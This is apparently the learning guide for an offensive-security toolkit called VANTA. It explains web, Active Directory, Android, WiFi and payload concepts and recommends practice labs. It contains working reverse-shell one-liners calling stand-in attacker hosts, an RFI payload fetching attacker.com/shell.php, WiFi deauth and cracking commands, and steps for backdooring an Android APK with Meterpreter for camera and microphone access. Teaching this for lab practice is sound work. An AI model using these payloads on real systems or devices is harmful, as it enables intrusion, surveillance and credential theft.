A small sequence of machine code (assembly language compiled to raw bytes) designed to spawn a shell when executed. Must be position-independent (no hardcoded addresses). Meterpreter's stager IS shellcode — it runs in memory, loads Stage 1, establishes C2.
Format String Vulnerability
When user input is passed directly as a printf format string: printf(user_input) instead of printf("%s", user_input). Input like %x %x %x leaks stack memory. %n writes to memory. Still found in embedded firmware and IoT devices.
PIE (Position Independent Executable)
When an executable is compiled as PIE, it can load at any base address (works with ASLR). Non-PIE binaries always load at a fixed address, making exploitation easier since you know where code is. checksec ./binary shows if PIE is enabled.
Web Security
Same-Origin Policy (SOP)
A browser security rule: JavaScript on site A cannot read responses from site B. An XSS payload runs within site A's origin, so it CAN read site A's cookies, DOM, and make authenticated requests to site A's API. That's why XSS is so dangerous.
CSRF (Cross-Site Request Forgery)
Tricks a victim's browser into making an authenticated request to a site where they're logged in. Example: victim visits attacker's page which has <img src="bank.com/transfer?to=attacker&amount=1000"> — browser sends the request with the victim's session cookie.
SSRF (Server-Side Request Forgery)
An attack where you make a server fetch a URL you specify. If the server can reach internal services (metadata APIs, databases, admin panels), you use SSRF to access them from the server's internal perspective. websec's ssrf operation tests for this.
WAF (Web Application Firewall)
A reverse proxy that inspects HTTP traffic for attack patterns. Blocks requests containing obvious SQLi/XSS payloads. Bypassed by encoding (%27 instead of '), case variation (SeLeCt), comment injection (SE/**/LECT), and HTTP parameter pollution. websec's waf_evasion mode applies these.
LFI / RFI (Local/Remote File Inclusion)
Vulnerabilities in PHP where user-controlled file paths are passed to include(). LFI: read local files (?page=../../etc/passwd). RFI: include a remote URL containing attacker's PHP code (?page=http://attacker.com/shell.php) — instant RCE if allow_url_include is on.
IDOR (Insecure Direct Object Reference)
Accessing resources by guessing/changing an ID parameter without authorization checks. /api/users/123/data → try /api/users/1/data (admin?). websec's idor_test operation increments/decrements IDs to find unauthorized access. One of the most common bug bounty findings.
Windows / Active Directory
Domain Controller (DC)
The Windows server that runs Active Directory. Stores all user accounts, passwords (as hashes), group memberships, and policies for the entire domain. Owning a DC = owning the entire organization. DCSync attack extracts all credentials from the DC without touching disk.
Kerberos Ticket (TGT / TGS)
TGT (Ticket-Granting Ticket): proof that you authenticated. Valid 10 hours by default. TGS (Ticket-Granting Service): a ticket for a specific service, encrypted with that service's key — this is what Kerberoasting steals. Golden Ticket: forged TGT using krbtgt hash — valid forever.
DCSync
An attack that replicates Active Directory credential data without touching the DC's files. Uses legitimate AD replication protocol (DS-Replication-Get-Changes-All permission). impacket's secretsdump.py implements this. Requires Domain Admin or replication permissions.
LSASS (Local Security Authority)
Windows process that handles authentication. Keeps copies of recently used credentials in memory — NTLM hashes, Kerberos tickets, and on older systems, plaintext passwords (WDigest). Dumping LSASS (via ProcDump, Task Manager, or Mimikatz) extracts these credentials.
ACL (Access Control List)
Permissions on AD objects. GenericAll = full control. WriteDACL = can modify permissions. WriteOwner = can take ownership. GenericWrite = can write any attribute. BloodHound maps ACL relationships — a chain of ACLs is often the path from a low-priv user to Domain Admin.
Lateral Movement
Moving from a compromised machine to other machines in the network using valid credentials, tickets, or protocol exploitation. Tools: PsExec (SMB), WMI, WinRM (PowerShell Remoting), RDP, DCOM. windowsAD's shell operation implements PsExec-style lateral movement.
12 The Terminal

What is a Terminal?

A terminal is a text interface to your operating system. Instead of clicking icons, you type commands. Every VANTA operation runs in a terminal. Understanding how terminals work is not optional — it is the bedrock of offensive security.

Terminal vs Shell vs Console

Terminal
The window that displays text. Examples: GNOME Terminal, iTerm2, Windows Terminal, Alacritty. The terminal itself is just a renderer — it shows what the shell outputs.
Shell
The program inside the terminal that reads your commands and executes them. Common shells: bash (most Linux), zsh (macOS default), sh (POSIX minimal), fish (feature-rich). Shells also run script files.
Console / TTY
A physical or virtual text device. In Linux you can switch to pure text mode TTYs with Ctrl+Alt+F2 through F6. SSH sessions give you a remote pseudo-TTY (PTY). VANTA's Shell tab is a PTY.

The Prompt — Reading It

user@hostname:~$          # normal user  ($ is the prompt character)
root@kali:/tmp#           # root user    (# means root — full system access)
┌──(kali㉿kali)-[~]
└─$                       # Kali Linux default prompt — same as above, styled

~ means your home directory (/home/username). The part after the colon is your current directory. When VANTA says "run this in your terminal," you paste it after the $ or #.

Essential Shell Concepts

stdin / stdout / stderr
Every process has 3 file descriptors: 0=input (keyboard), 1=output (screen), 2=errors. 2>/dev/null suppresses errors. >file redirects output to a file.
Pipe |
Takes stdout of one command and feeds it as stdin to the next. nmap 192.168.1.0/24 | grep open — only shows lines containing "open".
Background &
Appending & runs a command in the background so you get your prompt back. msfconsole -q & starts Metasploit without blocking your shell.
Environment Variables
export LHOST=192.168.1.10 sets a variable available to all child processes. echo $PATH shows where the shell looks for programs. env lists all current variables.
Wildcards / Glob
* matches anything: ls *.apk lists all APK files. ? matches one character. [abc] matches one of those chars.
Ctrl+C / Ctrl+Z
Ctrl+C sends SIGINT — stops most programs immediately. Ctrl+Z suspends the process (pause, not kill). fg brings it back. bg resumes it in background.

Superuser — What Root Means

root (UID 0) is the superuser — it can read, write, or delete any file on the system and run any command. Most VANTA operations that require hardware access (raw sockets, monitor mode, USB) need root. sudo command runs one command as root. sudo -i drops you into a root shell. Never run as root unless required — it's a security risk. 
sudo python3 android_gui.py        # run as root (needed for raw ADB features)
sudo -i                            # become root in this shell (careful)
whoami                             # shows your current username
id                                 # shows uid, gid, and group memberships
13 OSI Model

How Networks Are Layered

The OSI model divides networking into 7 layers. Every tool in VANTA operates at specific layers. Knowing which layer you are attacking determines which tools and techniques apply.

Layer 7 — Application
Protocols users interact with: HTTP, HTTPS, DNS, FTP, SMTP, SSH. websec targets this layer — SQL injection, XSS, SSRF all live here. This is where business logic and authentication happen.
Layer 6 — Presentation
Encoding and encryption: TLS/SSL lives here. When a HTTPS connection is established, the TLS handshake happens at Layer 6. Certificate spoofing attacks target this layer.
Layer 5 — Session
Managing connections between apps. Session hijacking (stealing a user's authenticated session cookie to impersonate them) targets this layer. WebSockets operate here.
Layer 4 — Transport
TCP and UDP live here. Ports live here. SYN scans (the default nmap scan) craft raw TCP SYN packets to check if a port accepts connections — a Layer 4 operation.
Layer 3 — Network
IP addresses live here. Routing happens here. ICMP (ping) is a Layer 3 protocol. netrecon's host discovery sends ICMP packets to find live devices on a subnet.
Layer 2 — Data Link
MAC addresses and frames live here. ARP maps IP→MAC at this layer. mac_spoof operates at Layer 2 — changing your MAC address fools the network's view of which hardware is speaking.
Layer 1 — Physical
Actual radio waves, cables, and signals. WiFi (802.11) PHY headers live here. wifi_monitor puts your NIC in monitor mode to capture raw 802.11 frames — this is a Layer 1/2 operation. 
Quick reference: where VANTA modules attack

Layer 7 (App):      websec — HTTP injection, SSRF, auth bypass
Layer 4 (Transport):netrecon — TCP SYN scan, port enumeration
Layer 3 (Network):  netrecon — ICMP discovery, traceroute
Layer 2 (Data Link):mac_spoof — ARP, MAC address spoofing
Layer 1 (Physical): wifi_monitor — 802.11 monitor mode, deauth
14 DNS

How Names Become Numbers

DNS (Domain Name System) translates human-readable names like google.com into IP addresses like 142.250.80.14. Every pentest touches DNS — it reveals infrastructure, subdomains, and mail servers.

How a DNS Lookup Works (Step by Step)

You type:  https://example.com

1. Your OS checks its local cache — if it was looked up recently, done.
2. OS asks your configured DNS resolver (usually your router, e.g. 192.168.1.1)
3. Resolver asks a Root Nameserver: "Who handles .com?"
4. Root replies: "Ask 192.5.6.30 (a .com nameserver)"
5. .com nameserver replies: "Ask ns1.example.com for example.com"
6. ns1.example.com replies: "example.com = 93.184.216.34"
7. Your OS caches the answer (for the TTL seconds) and connects to 93.184.216.34

DNS Record Types — What They Mean

A Record
Maps a hostname to an IPv4 address. dig example.com A. The most common record. Most recon starts here.
AAAA Record
Maps a hostname to an IPv6 address. IPv6 addresses are 128 bits, written as 8 colon-separated hex groups: 2001:0db8:85a3::8a2e:0370:7334
MX Record
Mail eXchanger — which server handles email for this domain. Leaks email infrastructure. Phishing pretext builds often start with MX recon.
CNAME Record
Alias — points to another hostname. www.example.com → example.com. Subdomain takeover attacks exploit stale CNAMEs pointing to deprovisioned services.
TXT Record
Arbitrary text. Used for SPF (email auth), DKIM keys, and verification tokens. Often leaks internal tool names, cloud provider details, and subdomains in SPF includes.
PTR Record
Reverse DNS — maps IP → hostname. dig -x 8.8.8.8 returns dns.google. Useful for enriching scan output: a raw IP reveals its hostname.

DNS in Pentesting

dig example.com A               # A record lookup
dig example.com MX              # mail server
dig example.com TXT             # SPF/DKIM/verification records
dig example.com ANY             # all records (often blocked)
dig @8.8.8.8 example.com        # query specific resolver (Google's)

nslookup example.com            # Windows-friendly alternative

# Subdomain enumeration (find hidden services)
ffuf -w /usr/share/wordlists/subdomains.txt -u https://FUZZ.example.com
15 HTTP Protocol

How the Web Actually Works

HTTP (HyperText Transfer Protocol) is the language browsers and servers use to communicate. Every web vulnerability — SQLi, XSS, SSRF, IDOR — is an HTTP protocol being abused. You cannot do web security without understanding HTTP at the byte level.

The Request–Response Cycle

                  ┌─────────────────────────────────────┐
  Browser          │  HTTP Request                        │
  sends ──────────▶│  GET /login HTTP/1.1                 │
                   │  Host: example.com                   │
                   │  Cookie: session=abc123              │
                   │  User-Agent: Mozilla/5.0 ...         │
                   └─────────────────────────────────────┘

                   ┌─────────────────────────────────────┐
  Server           │  HTTP Response                       │
  replies ◀────────│  HTTP/1.1 200 OK                     │
                   │  Content-Type: text/html             │
                   │  Set-Cookie: session=xyz789          │
                   │                                      │
                   │  <html>...</html>                   │
                   └─────────────────────────────────────┘

HTTP Methods — What Each One Does

GET
Fetch a resource. Parameters in the URL: /search?q=hello. GET requests are logged in server logs and browser history — never put passwords in GET params.
POST
Send data to the server. Body is not in the URL. Used for form submissions, login, file uploads. Still visible in proxy tools like Burp Suite.
PUT / PATCH
Update a resource. REST APIs use PUT (full replace) and PATCH (partial update). Improper access control on these endpoints is a common finding.
DELETE
Remove a resource. If unauthenticated DELETE is allowed, an attacker can destroy data. Test: curl -X DELETE https://api.example.com/users/1
OPTIONS
Ask which methods the server allows on a resource. Used in CORS preflight checks. curl -X OPTIONS https://example.com/api -v reveals allowed methods.
HEAD
Same as GET but returns only headers, no body. Used to check if a resource exists without downloading it. Useful in automated recon to verify endpoints.

Status Codes You Must Know

200 OK               — request succeeded, resource returned
301 / 302            — redirect (301=permanent, 302=temporary) — follow these in recon
400 Bad Request      — malformed request — check your payload syntax
401 Unauthorized     — auth required but not provided (no session/token)
403 Forbidden        — auth provided but permission denied — probe for bypasses
404 Not Found        — resource doesn't exist — or hidden (403 is more interesting)
405 Method Not Allowed— server won't allow that HTTP method on this endpoint
500 Internal Error   — server crashed — often reveals error messages with code paths
502 Bad Gateway      — proxy/load balancer can't reach the backend
503 Service Unavail  — server intentionally unavailable (rate limit, maintenance)

Headers That Matter in Security

Cookie
Sent by browser every request. Contains session tokens, auth state. If stolen (XSS, MITM), attacker gets authenticated access. Look for Secure and HttpOnly flags.
Authorization
Bearer <token> for JWT auth. Basic <base64> for HTTP Basic. Basic auth is credentials as base64 — not encryption, trivially decoded.
Content-Type
Tells the server what format the request body is in. application/json, multipart/form-data (file upload), text/xml. Mismatched content types sometimes bypass WAFs.
X-Forwarded-For
Carries the original client IP behind a proxy. If the server trusts this header without validation, attackers can spoof their IP address to bypass IP-based rate limiting.
Server / X-Powered-By
Reveals software version: nginx/1.14.0, PHP/7.2.3. Version leaks let attackers look up CVEs for that exact version.
CORS Headers
Access-Control-Allow-Origin: * means any website can make cross-origin requests. If combined with cookies being sent, this is a critical misconfiguration.
16 Android Security

How Android Apps Are Sandboxed

The android_pentest module operates against the Android security model. To understand what the module does and why each technique works (or doesn't), you need to understand how Android isolates apps and where the weaknesses are.

The Android Security Model

UID Isolation
Every installed app gets its own Linux user ID (UID). App A runs as UID 10042, App B as UID 10043. They cannot read each other's files in /data/data/ — enforced by standard Linux DAC. Root (UID 0) bypasses this entirely, which is why rooting is the first step in deep-dive testing.
APK Structure
An APK is a ZIP file. Inside: AndroidManifest.xml (app declaration, permissions, components), classes.dex (Dalvik bytecode — the compiled app logic), res/ (UI layouts, images, strings), lib/ (native .so files). apktool decodes all of this to human-readable form.
Permissions
Apps declare required permissions in the Manifest. Dangerous permissions (CAMERA, MICROPHONE, READ_CONTACTS, ACCESS_FINE_LOCATION) require runtime user approval (Android 6+). Normal permissions are auto-granted. The android_pentest backdoor requests specific permissions to enable the C2 capabilities.

Android Components — What Attackers Target

AndroidManifest.xml declares 4 component types:

  Activity     — a screen (UI). Exported activities can be launched by other apps or via ADB.
                 Attack: intent injection, exported activity access without auth

  Service      — background process. The Meterpreter backdoor runs as a Service.
                 Attack: exposed services, privilege escalation through service bindings

  BroadcastReceiver — responds to system or app events (BOOT_COMPLETED, SMS_RECEIVED).
                 Attack: boot persistence (register for BOOT_COMPLETED), intent sniffing

  ContentProvider — shared data store (contacts, photos). URI-accessible.
                 Attack: SQL injection via content URIs, exposed providers leaking data

How the android_pentest Backdoor Works

1. Target APK downloaded/obtained
2. apktool decodes APK → smali (assembly-level Android bytecode)
3. Payload smali files injected into decoded source
4. AndroidManifest.xml modified to add:
   - INTERNET, READ_PHONE_STATE, RECORD_AUDIO, CAMERA permissions
   - Service declaration for the C2 component
   - BOOT_COMPLETED receiver for persistence
5. APK recompiled and signed with our keystore
6. ADB installs the modified APK on target device
7. Meterpreter connects back to our handler (LHOST:LPORT)

ADB — What It Actually Does

ADB Daemon
adbd runs on the Android device as a system service. It listens for USB connections (and TCP on port 5555 if WiFi ADB is enabled). ADB commands are forwarded through this daemon.
ADB over TCP
adb connect 192.168.1.50:5555 connects over WiFi instead of USB. Devices with exposed port 5555 are trivially exploitable — no auth required on many firmware versions.
adb shell
Opens a shell on the device running as the shell user (UID 2000). On rooted devices, adb shell su gives root. Most pentest operations use adb shell.
adb install
Installs an APK on the connected device. -r replaces an existing app. The device must have "Install from unknown sources" or ADB debugging enabled.
17 WiFi Security

How WiFi Can Be Compromised

WiFi uses radio waves. Unlike a cable (private), radio waves travel through walls and into the street. Security relies entirely on encryption. When encryption is weak or handshakes are captured, the password can be recovered offline. The wifi_monitor module automates this capture.

WPA2 — The 4-Way Handshake

When a device connects to a WPA2 network:

Client                          Access Point (AP)
  │                                    │
  │──── Association Request ──────────▶│
  │◀─── ANonce (AP nonce) ─────────────│  (random number)
  │                                    │
  │  Client generates SNonce, derives PTK using:
  │  PTK = f(PMK, ANonce, SNonce, client_MAC, AP_MAC)
  │  PMK = PBKDF2(HMAC-SHA1, password, SSID, 4096, 32)
  │                                    │
  │──── SNonce + MIC ─────────────────▶│  (MIC proves client knows PMK)
  │◀─── GTK (group key) + MIC ─────────│
  │──── ACK ──────────────────────────▶│

The attacker captures SNonce + ANonce + MIC from the air.
Then runs offline dictionary attack: try each password, compute PTK, verify MIC.
If MIC matches → password found.

Monitor Mode vs Managed Mode

Managed Mode (Normal)
Default WiFi mode. Your NIC only processes packets addressed to your MAC or broadcast. It ignores all other traffic on the channel. You cannot capture traffic for other devices.
Monitor Mode
NIC captures all 802.11 frames regardless of destination. Required for passive WiFi attacks. Not all NICs support this — check with iw list | grep monitor. wifi_monitor enables this automatically. 
# What wifi_monitor does under the hood:
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

# Channel lock (stay on target AP's channel)
iw dev wlan0 set channel 6

# Capture with airodump-ng
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0

# Deauth attack to force clients to re-associate (capture handshake)
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0

# Crack offline
hashcat -m 22000 capture.hccapx wordlist.txt
18 Payloads & Staging

What a Payload Actually Is

In pentesting, a payload is the code that runs on the target after exploitation. The payload is what gives you control. Understanding payload types is essential for choosing the right technique for each android_pentest and revshell operation.

Staged vs Stageless

Stageless (inline)
The entire payload is embedded in the APK / binary. Self-contained. Uses more space. Works even if the attacker's server is unreachable during initial execution.

Metasploit name: android/meterpreter_reverse_tcp (no slash between meterpreter_reverse)
Staged (stager + stage)
A tiny stager is embedded — its only job is to connect back and download the real stage (Meterpreter) from the handler. Smaller initial binary. Requires the handler to be running when the payload executes.

Metasploit name: android/meterpreter/reverse_tcp (slash between meterpreter/reverse)

Meterpreter — What It Is

Meterpreter is Metasploit's advanced in-memory payload. Key properties:

  - Runs entirely in memory — no files written to disk (evasion)
  - Encrypted communications — looks like normal HTTPS traffic
  - Extensible — load modules: screenshot, webcam_snap, sysinfo, hashdump
  - Pivoting — use compromised host to reach internal network
  - Persistence — embed in startup scripts, registry, cron jobs

Core commands:
  sysinfo            → OS, hostname, architecture
  getuid             → current user and UID
  screenshot         → capture screen
  webcam_snap        → photo from front/rear camera
  record_mic 10      → 10 seconds of audio
  shell              → drop into device OS shell
  upload /file /path → push file to device
  download /path     → pull file from device

Transport Protocols — Why It Matters

reverse_tcp
Target connects outbound to attacker. Most firewalls allow outbound TCP. Best when target is behind NAT. Requires attacker to have a public IP or tunnel (bore, cloudflare).
reverse_https
Same as reverse_tcp but over TLS on port 443. Blends with web traffic. Best for evading corporate firewalls and deep packet inspection. VANTA default for WAN ops.
bind_tcp
Payload opens a listener on the target — attacker connects in. Blocked by most firewalls (inbound rules). Use only on LAN targets or when attacker can reach target directly.
bore / Cloudflare Tunnel
Exposes a local port to the internet via a tunnel service. VANTA uses bore to forward LPORT 4444 to a bore.pub subdomain, giving the target a reachable internet address to connect to.
19 Reverse Shells

What a Reverse Shell Actually Does

A reverse shell is one of the most fundamental concepts in offensive security. Every meterpreter session, every C2 callback, every netcat listener is a reverse shell in some form. Understanding it from first principles makes the revshell module and every advanced technique click.

Bind Shell vs Reverse Shell

Bind Shell (attacker connects TO target):

  Target:   nc -lvnp 4444 -e /bin/bash     # opens port 4444, gives shell to anyone who connects
  Attacker: nc 192.168.1.50 4444            # connect to target's open port

  Problem: target's firewall blocks inbound port 4444.

──────────────────────────────────────────────────────────────────

Reverse Shell (target connects TO attacker):

  Attacker: nc -lvnp 4444                   # open listener on our machine
  Target:   bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1  # target calls back

  Works because: firewalls usually allow outbound connections.
  The target initiates — it goes OUT through the firewall, not in.

One-Liners — How They Work

Bash /dev/tcp
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 Bash's built-in /dev/tcp device opens a TCP connection. Redirects stdin/stdout/stderr to the socket. Gives the attacker an interactive bash session over TCP.
Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash"])'
Netcat (with -e)
nc -e /bin/bash 10.0.0.1 4444 — available in ncat/some nc versions. Executes /bin/bash and connects its stdin/stdout to the network socket.
Upgrading a Shell
Raw netcat shells have no TTY — Ctrl+C kills the session, no tab completion. Upgrade: python3 -c 'import pty;pty.spawn("/bin/bash")' then stty raw -echo; fg on attacker side.

What revshell Does

revshell generates and delivers working reverse shell payloads for:

  go     → compiled Go binary (static, no deps, works anywhere)
  py     → Python3 one-liner (runs on any system with Python)
  bash   → bash /dev/tcp one-liner
  pwsh   → PowerShell (Windows targets)
  php    → web shell via PHP RCE
  node   → Node.js reverse shell

VANTA auto-starts a netcat/msfconsole listener on LPORT and optionally
runs bore to expose LHOST to the internet for WAN targets.
20 OWASP Top 10

The 10 Most Critical Web Vulnerabilities

The OWASP Top 10 is the industry-standard list of the most critical web application security risks. The websec module covers all 10. Know these before you touch websec.

A01 — Broken Access Control
#1 most common. Users can access resources/functions they shouldn't. IDOR: /api/user/1234 → change to /api/user/1235 and you read another user's data.
A02 — Cryptographic Failures
Weak or absent encryption. Passwords stored as MD5. Data transmitted over HTTP. TLS 1.0 still accepted. AES-ECB used (deterministic — patterns visible in ciphertext).
A03 — Injection
SQL injection, command injection, LDAP injection. Untrusted input reaches an interpreter. ' OR '1'='1 in a login form may bypass authentication entirely.
A04 — Insecure Design
Architectural flaws — missing rate limiting on login (brute force), no account lockout, business logic that can be abused (buy items at negative price).
A05 — Security Misconfiguration
Default credentials. Debug mode on in prod. S3 bucket public. Verbose error messages leaking stack traces and code paths.
A06 — Vulnerable Components
Using outdated libraries with known CVEs. Log4Shell was this category. Check: npm audit, pip-audit, snyk test.
A07 — Authentication Failures
Weak passwords allowed. No MFA. Session tokens predictable. Password reset via guessable security questions. Sessions not invalidated on logout.
A08 — Software Integrity Failures
Unsigned updates. CI/CD pipelines that pull from unverified sources. Deserialization of untrusted data (Java/PHP object injection).
A09 — Logging Failures
No logging of failed logins, no alerts on anomalous access. Attackers operate for months undetected. Also: logs that include sensitive data (passwords in URLs).
A10 — SSRF
Server-Side Request Forgery. App makes HTTP request to attacker-controlled URL: url=http://169.254.169.254/latest/meta-data/ → reads AWS metadata (credentials).
21 Practice Lab

Building Your Home Lab

You need a lab to safely practice. Practicing on real systems you don't own is illegal. A home lab gives you intentionally vulnerable targets — legally — for every skill level. This is the minimum setup to work through all VANTA modules.

Layer 0 — Your Attack Machine

Option A: Kali Linux (Recommended)
Debian-based distro with every offensive tool pre-installed. apt install kali-linux-everything after a minimal install. Run as a VM (VirtualBox, VMware, Parallels) or on dedicated hardware. VANTA was developed on Kali — highest compatibility.
Option B: ParrotOS / Ubuntu
Any Debian/Ubuntu system works. Install tools manually as needed. ParrotOS is lighter than Kali with a similar toolset. Ubuntu works fine — you'll just run more apt install commands.

Layer 1 — Vulnerable Target VMs

Download intentionally vulnerable machines from:

  Vulnhub.com          → free OVA/VMDK images, thousands of machines
  TryHackMe.com        → browser-based, guided rooms, beginner-friendly
  HackTheBox.com       → more challenging, CTF-style
  OffSec Proving Grounds → OSCP-style machines

Recommended first targets:
  Metasploitable 2     → Vulnhub — every classic vuln, great for MSF practice
  DVWA                 → Damn Vulnerable Web App — runs in Docker, all OWASP top 10
  VulnDocker           → Docker compose with intentionally misconfigured containers
  Android Emulator     → AVD with debugging enabled for android_pentest practice

Layer 2 — Network Isolation

Critical: Always run vulnerable VMs on an isolated host-only network — never on your main network or bridged to the internet. A compromised Metasploitable 2 that's internet-accessible could be used as a stepping stone by external attackers. 
VirtualBox: Set VM network to "Host-Only Adapter" → vboxnet0
VMware:     Set VM network to "Host-Only" → vmnet1

Your attack machine can reach the vulnerable VM.
The vulnerable VM cannot reach the internet.
Your actual network is completely isolated.

Check with: ip addr show   (on vulnerable VM — should show 192.168.56.x range)

Docker Lab — Quick Start

# Spin up DVWA (web app testing):
docker run -d -p 80:80 vulnerables/web-dvwa
# Open http://localhost → admin/password → set security to low → test all vulns

# Spin up a vulnerable SSH target:
docker run -d -p 2222:22 sickp/alpine-sshd
ssh -p 2222 root@localhost   # password: root

# Spin up intentionally vulnerable API:
docker run -d -p 5000:5000 clementinesurprenant/vuln-nodejs-app
22 CTF Basics

Capture The Flag — How It Works

CTF (Capture The Flag) competitions are how most security professionals learn and measure their skills. You solve security challenges to find hidden strings called flags. The ctfpwn module automates common CTF techniques.

CTF Categories

Web
Exploit web applications to find flags. SQL injection, XSS, SSRF, JWT manipulation, cookie forgery. Often the most beginner-accessible category.
Crypto
Break cryptographic schemes. RSA with small e, XOR with repeated key, CBC bit-flipping, Vigenère cipher analysis. Python is your main tool here.
Reverse Engineering
Analyze compiled binaries to understand what they do. Decompile with Ghidra, debug with GDB. Find hardcoded flags, license key algorithms, self-modifying code.
Pwn / Binary Exploitation
Buffer overflow, format string, heap exploitation. Write shellcode, ret2libc, ROP chains. Typically Linux x64 ELF binaries. The hardest category — but the most satisfying.
Forensics
Analyze disk images, memory dumps, packet captures, steganography. Flag hidden in image metadata, in deleted files, in network traffic. binwalk, Autopsy, Wireshark.
OSINT
Open Source Intelligence — find flags using public information. Find email via domain lookup, LinkedIn profiles via username, location from EXIF metadata in photos.

Flag Format and Submission

Most CTFs use a flag format like:
  CTF{this_is_a_sample_flag}
  FLAG{s0me_secret_string_h3re}
  VANTA{found_it}

You paste the flag into the CTF platform to get points.

First CTF checklist:
  1. TryHackMe account → complete "Introduction to Pentesting" learning path
  2. Solve "Mr Robot" (medium), "Basic Pentesting" (easy)
  3. For web: try "OWASP Top 10" room (free)
  4. For all-around: "Advent of Cyber" (free each December)
  5. Progress to HackTheBox starting boxes: "Lame", "Legacy", "Blue"

ctfpwn — What It Automates

VANTA ctfpwn module covers common CTF tasks:

  binary_enum     → checksec, strings, file type, disassemble entry point
  sqli_scan       → sqlmap-style injection test across parameters
  lfi_scan        → Local File Inclusion path traversal attempts
  hash_crack       → rockyou wordlist attack on MD5/SHA1/SHA256
  steg_extract    → steghide, zsteg, binwalk extraction from images
  jwt_tamper      → decode JWT, try alg:none, crack HS256 with wordlist
  b64_decode      → recursive base64/base32/rot13/hex decode chain
11 Study Resources

Where to Go Deeper

VANTA is a framework for applying knowledge, not a substitute for it. These resources build the conceptual foundation you need to understand why the tools work — making you effective even when the automation fails. Ordered by cost (free first).

Free Practice Platforms

PortSwigger Web Security Academy
portswigger.net/web-security — The best free web security course online. 100+ interactive labs covering SQLi, XSS, SSRF, XXE, CSRF, IDOR, deserialization, and more. Use websec against the lab URLs. No account required for most labs.
TryHackMe
tryhackme.com — Browser-based labs with guided rooms for every security topic. Free tier gives access to most content. Start with: "Pre-Security" → "Introduction to Cybersecurity" → "Jr Penetration Tester" path.
HackTheBox
hackthebox.com — Harder than TryHackMe, closer to real engagement experience. Free tier includes some machines. The Academy section has structured courses. Filter machines by OS and difficulty. Read write-ups after solving (or failing).
Metasploit Unleashed
offensive-security.com/metasploit-unleashed — Free Metasploit course by Offensive Security. Covers the framework VANTA's revshell and android_pentest modules use for payload generation and handlers.
OWASP
owasp.org — The Open Web Application Security Project. Free resources: OWASP Top 10, Testing Guide, Mobile Security Testing Guide (MASTG). The MASTG is the companion reading for android_pentest and ios_pentest.
GTFOBins / LOLBAS
gtfobins.github.io (Linux) and lolbas-project.github.io (Windows) — Living Off The Land references. Which binaries already on a system can spawn shells, read files, or escalate privileges. Essential post-exploitation reference.
PayloadsAllTheThings
github.com/swisskyrepo/PayloadsAllTheThings — Massive collection of payloads for SQLi, XSS, command injection, file inclusion, SSRF, etc. Reference when websec's built-in payloads don't work — try the next one in the list.
HackTricks
book.hacktricks.xyz — Cheatsheets for exploiting every protocol, service, and vulnerability type. Port-by-port exploitation guide, AD attack chains, Linux/Windows privilege escalation. The reference you have open while running VANTA.

Free Vulnerable Apps (Your Lab Targets)

App / LabTypeSetupBest for practicing
DVWA Damn Vulnerable Web App Web docker run -p 80:80 vulnerables/web-dvwa websec — SQLi, XSS, file upload, command injection at 4 difficulty levels
Metasploitable 2/3 Linux VM Download from vulnhub.com, import into VirtualBox/KVM netrecon, revshell — vsftpd exploit, Samba, UnrealIRCd, dozens of vulns
GOAD (Game of Active Directory) Windows AD github.com/Orange-Cyberdefense/GOAD — Vagrant + VirtualBox windowsAD, adsec — full vulnerable AD forest with multiple DCs
InsecureBankv2 Android APK github.com/dineshshetty/Android-InsecureBankv2 android_pentest — exported activities, SQLite injection, weak crypto
DIVA Android Android APK github.com/payatu/diva-android android_pentest — 13 vulnerability challenges with hints
OWASP WebGoat Web docker run -p 8080:8080 webgoat/webgoat websec — explains each vuln then lets you exploit it
VulnHub VM collection vulnhub.com — download any VM, import into local hypervisor All modules — community-built vulnerable VMs from beginner to expert

Books — Deep Knowledge

The Web Application Hacker's Handbook
Stuttard & Pinto (Wiley) — Intermediate. Comprehensive web vuln reference. Chapters 9 (SQLi) and 12 (XSS) are still the best explanations anywhere. Read before advanced websec operations.
Penetration Testing
Georgia Weidman (No Starch) — Beginner-Intermediate. Full pentest methodology using Metasploit, Wireshark, and manual exploitation. The closest thing to a textbook companion for VANTA's workflow.
Android Security Internals
Nikolay Elenkov (No Starch) — Intermediate. The definitive Android security reference: sandboxing, permissions, cryptography, keystore, Binder IPC. Read chapters 1–5 before advanced android_pentest operations.
The Hacker Playbook 3
Peter Kim (Secure Planet) — Intermediate-Advanced. Red team techniques: C2, evasion, AD lateral movement, custom tooling. Covers the strategy behind what VANTA's AD modules implement.
Real-World Bug Hunting
Peter Yaworski (No Starch) — Beginner. Real bug bounty writeups for each vulnerability class. Shows how websec findings translate into report-quality documentation.
Black Hat Python
Seitz & Arnold (No Starch) — Intermediate. Build your own network tools, shells, and scanners in Python. Directly applicable to extending any VANTA module (all modules are Python).

Certifications — Structured Learning

CertificationLevelCostBest for
eJPT (eLearnSecurity Junior Penetration Tester) Beginner ~$200 First hands-on cert. Covers network scanning, web vulns, basics — all VANTA foundations.
PNPT (Practical Network Penetration Tester) Intermediate ~$400 TCM Security. Full pentest lab exam — network recon → AD exploitation. Direct VANTA workflow.
OSCP (PEN-200) Intermediate-Advanced ~$1500 Industry-recognized. Lab-based exam, 24h. The gold standard for pentesting certifications.
CRTP (Certified Red Team Professional) Intermediate ~$400 PentesterAcademy. Focuses on Active Directory attacks — directly applies to windowsAD module.
eMAPT (eLearnSecurity Mobile Application Penetration Tester) Intermediate ~$400 Android and iOS app pentesting methodology — direct companion to android_pentest module.
Recommendation: Don't chase certifications before building real skills. Complete TryHackMe's Jr Pentester path and root 10 HackTheBox machines first. The cert validates skills — it doesn't replace building them. Use VANTA on practice labs while you study, not instead of studying.
12 Your Roadmap

12-Week Learning Roadmap

Follow this plan to go from complete beginner to confidently using every VANTA module. Each week combines reading, lab practice, and VANTA usage — reinforcing knowledge through the tool.